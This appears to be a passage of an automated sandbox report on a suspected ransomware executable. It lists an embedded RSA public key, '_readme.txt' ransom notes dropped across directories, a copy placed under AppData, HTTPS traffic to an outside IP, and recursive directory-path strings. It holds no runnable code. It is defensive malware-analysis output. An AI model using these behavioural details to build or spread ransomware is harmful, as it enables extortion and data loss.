              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P2_2_00479E70
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeBinary or memory string: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\_readme.txtJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\_readme.txtJump to behavior
              Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\d|#O source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276405605.00000000032F8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276474116.00000000032FC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359865944.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2361850146.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275138437.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276086139.00000000038D0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275446209.00000000038BC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306832694.0000000003322000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2296597448.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307300636.000000000332B000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306029870.0000000003322000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2296040689.000000000330C000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298632060.0000000003322000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307180203.0000000003323000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2378718036.0000000003C90000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\S source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316699687.0000000003810000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314855874.0000000003806000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316052889.000000000380D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ate\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314093672.0000000003AF0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error620712704.txt source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\f source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251480244.0000000003361000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046044060.0000000003378000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\DB\. source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306779341.0000000003956000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307711721.0000000003966000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb' source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.ppvwvMno source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.0000000003813000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2370453597.000000000388E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366626954.0000000003839000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369012097.0000000003839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369942184.0000000003C21000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362545370.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366153323.0000000003C20000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\`F"IH source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2378718036.0000000003C19000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251806523.000000000333D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\A; source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2370453597.000000000388E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366626954.0000000003839000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369012097.0000000003839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ache\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316699687.0000000003810000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306879386.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297158244.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314855874.0000000003806000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307257560.00000000037F7000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2308025435.0000000003803000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316052889.000000000380D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298330400.00000000037EF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.ppvwV source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2315059111.00000000038AC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2367688022.0000000003B61000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\b, source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316169449.000000000333A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306029870.0000000003322000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316249457.0000000003353000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306348471.0000000003347000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalCache\te\mp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\*a\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2368905489.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2386123176.0000000000B23000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Logs\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369942184.0000000003C21000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366153323.0000000003C20000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133408906620712704.txt\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353303080.0000000003B30000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*M source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2367688022.0000000003B61000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359906462.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353303080.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362164144.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ome\\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251806523.000000000333D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\* source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\m source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2378718036.0000000003C90000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\= source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314093672.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316398950.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2355137046.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353303080.0000000003B30000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2367136260.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360571973.000000000331B000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2368122855.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2361063125.000000000331B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359906462.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360903093.0000000003AED000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360193328.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362164144.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp, 